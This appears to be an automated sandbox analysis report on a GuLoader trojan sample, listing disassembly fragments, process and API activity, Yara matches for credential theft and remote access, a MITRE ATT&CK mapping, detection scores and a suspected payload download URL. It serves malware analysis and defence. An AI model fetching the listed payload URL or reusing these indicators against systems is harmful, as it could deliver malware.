      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov ecx, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369570C0 mov eax, dword ptr fs:[00000030h]6_2_369570C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369BD0C0 mov eax, dword ptr fs:[00000030h]6_2_369BD0C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369BD0C0 mov eax, dword ptr fs:[00000030h]6_2_369BD0C0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369650E4 mov eax, dword ptr fs:[00000030h]6_2_369650E4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369650E4 mov ecx, dword ptr fs:[00000030h]6_2_369650E4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A150D9 mov eax, dword ptr fs:[00000030h]6_2_36A150D9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0903E mov eax, dword ptr fs:[00000030h]6_2_36A0903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0903E mov eax, dword ptr fs:[00000030h]6_2_36A0903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0903E mov eax, dword ptr fs:[00000030h]6_2_36A0903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0903E mov eax, dword ptr fs:[00000030h]6_2_36A0903E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E705E mov ebx, dword ptr fs:[00000030h]6_2_369E705E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E705E mov eax, dword ptr fs:[00000030h]6_2_369E705E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15060 mov eax, dword ptr fs:[00000030h]6_2_36A15060
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3696B052 mov eax, dword ptr fs:[00000030h]6_2_3696B052
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov ecx, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36951070 mov eax, dword ptr fs:[00000030h]6_2_36951070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369BD070 mov ecx, dword ptr fs:[00000030h]6_2_369BD070
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369C106E mov eax, dword ptr fs:[00000030h]6_2_369C106E
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36997190 mov eax, dword ptr fs:[00000030h]6_2_36997190
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F5180 mov eax, dword ptr fs:[00000030h]6_2_369F5180
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F5180 mov eax, dword ptr fs:[00000030h]6_2_369F5180
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3695B1B0 mov eax, dword ptr fs:[00000030h]6_2_3695B1B0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F11A4 mov eax, dword ptr fs:[00000030h]6_2_369F11A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F11A4 mov eax, dword ptr fs:[00000030h]6_2_369F11A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F11A4 mov eax, dword ptr fs:[00000030h]6_2_369F11A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F11A4 mov eax, dword ptr fs:[00000030h]6_2_369F11A4
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A131E1 mov eax, dword ptr fs:[00000030h]6_2_36A131E1
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697D1D0 mov eax, dword ptr fs:[00000030h]6_2_3697D1D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3697D1D0 mov ecx, dword ptr fs:[00000030h]6_2_3697D1D0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369E71F9 mov esi, dword ptr fs:[00000030h]6_2_369E71F9
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A151CB mov eax, dword ptr fs:[00000030h]6_2_36A151CB
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369651EF mov eax, dword ptr fs:[00000030h]6_2_369651EF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369451ED mov eax, dword ptr fs:[00000030h]6_2_369451ED
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A17120 mov eax, dword ptr fs:[00000030h]6_2_36A17120
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941131 mov eax, dword ptr fs:[00000030h]6_2_36941131
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36941131 mov eax, dword ptr fs:[00000030h]6_2_36941131
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B136 mov eax, dword ptr fs:[00000030h]6_2_3693B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B136 mov eax, dword ptr fs:[00000030h]6_2_3693B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B136 mov eax, dword ptr fs:[00000030h]6_2_3693B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693B136 mov eax, dword ptr fs:[00000030h]6_2_3693B136
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947152 mov eax, dword ptr fs:[00000030h]6_2_36947152
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939148 mov eax, dword ptr fs:[00000030h]6_2_36939148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939148 mov eax, dword ptr fs:[00000030h]6_2_36939148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939148 mov eax, dword ptr fs:[00000030h]6_2_36939148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36939148 mov eax, dword ptr fs:[00000030h]6_2_36939148
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D3140 mov eax, dword ptr fs:[00000030h]6_2_369D3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D3140 mov eax, dword ptr fs:[00000030h]6_2_369D3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D3140 mov eax, dword ptr fs:[00000030h]6_2_369D3140
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693F172 mov eax, dword ptr fs:[00000030h]6_2_3693F172
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369D9179 mov eax, dword ptr fs:[00000030h]6_2_369D9179
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A15152 mov eax, dword ptr fs:[00000030h]6_2_36A15152
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36947E96 mov eax, dword ptr fs:[00000030h]6_2_36947E96
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CDE9B mov eax, dword ptr fs:[00000030h]6_2_369CDE9B
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36973E8F mov eax, dword ptr fs:[00000030h]6_2_36973E8F
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDEB0 mov eax, dword ptr fs:[00000030h]6_2_369EDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDEB0 mov ecx, dword ptr fs:[00000030h]6_2_369EDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDEB0 mov eax, dword ptr fs:[00000030h]6_2_369EDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDEB0 mov eax, dword ptr fs:[00000030h]6_2_369EDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369EDEB0 mov eax, dword ptr fs:[00000030h]6_2_369EDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369FDEB0 mov eax, dword ptr fs:[00000030h]6_2_369FDEB0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693FEA0 mov eax, dword ptr fs:[00000030h]6_2_3693FEA0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693DEA5 mov eax, dword ptr fs:[00000030h]6_2_3693DEA5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693DEA5 mov ecx, dword ptr fs:[00000030h]6_2_3693DEA5
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369CDEAA mov eax, dword ptr fs:[00000030h]6_2_369CDEAA
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F9EDF mov eax, dword ptr fs:[00000030h]6_2_369F9EDF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_369F9EDF mov eax, dword ptr fs:[00000030h]6_2_369F9EDF
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A0BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A0BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A0BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_36A0BEE6 mov eax, dword ptr fs:[00000030h]6_2_36A0BEE6
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693BEC0 mov eax, dword ptr fs:[00000030h]6_2_3693BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3693BEC0 mov eax, dword ptr fs:[00000030h]6_2_3693BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
      Source: C:\Users\user\Desktop\Ntwph4urc1.exeCode function: 6_2_3694BEC0 mov eax, dword ptr fs:[00000030h]6_2_3694BEC0
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955EC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3696FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369CFEC5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36943EF4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36943EF4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36943EF4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36943EE1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36973EEB mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36973EEB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36973EEB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3697BE17 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3693DE10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A15E37 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A15E37 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A15E37 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36941E30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36941E30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A13E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36A13E10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3695DE2D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3695DE2D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3695DE2D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3697BE51 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3697BE51 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369E9E56 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36955E40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369FDE46 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3693BE78 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_3693FF90 mov edi, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_36951F92 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369E3F90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 6_2_369E3F90 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Process created: C:\Users\user\Desktop\Ntwph4urc1.exe "C:\Users\user\Desktop\Ntwph4urc1.exe"
Source: C:\Users\user\Desktop\Ntwph4urc1.exe | Code function: 0_2_004034A2 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess

Stealing of Sensitive Information

Source: Yara match | File source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 00000006.00000002.3114905568.00000000365B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Mitre Att&ck Matrix (techniques are listed per tactic column; a number in front of a technique is the count shown for it in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 Access Token Manipulation; 11 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Masquerading; 1 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 211 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 2 File and Directory Discovery; 23 System Information Discovery; Internet Connection Discovery; Wi-Fi Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Initial Sample
Source | Detection | Scanner | Label
Ntwph4urc1.exe | 74% | ReversingLabs | Win32.Trojan.Guloader
Ntwph4urc1.exe | 75% | Virustotal |
Ntwph4urc1.exe | 100% | Joe Sandbox ML |

Dropped Files
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nsn6F2A.tmp\System.dll | 0% | ReversingLabs |

Unpacked PE Files
No Antivirus matches

Domains
No Antivirus matches

URLs
Source | Detection | Scanner | Label
https://babalharra.com.au/ | 0% | Avira URL Cloud | safe
https://babalharra.com.au/yzSJO174.binK | 0% | Avira URL Cloud | safe
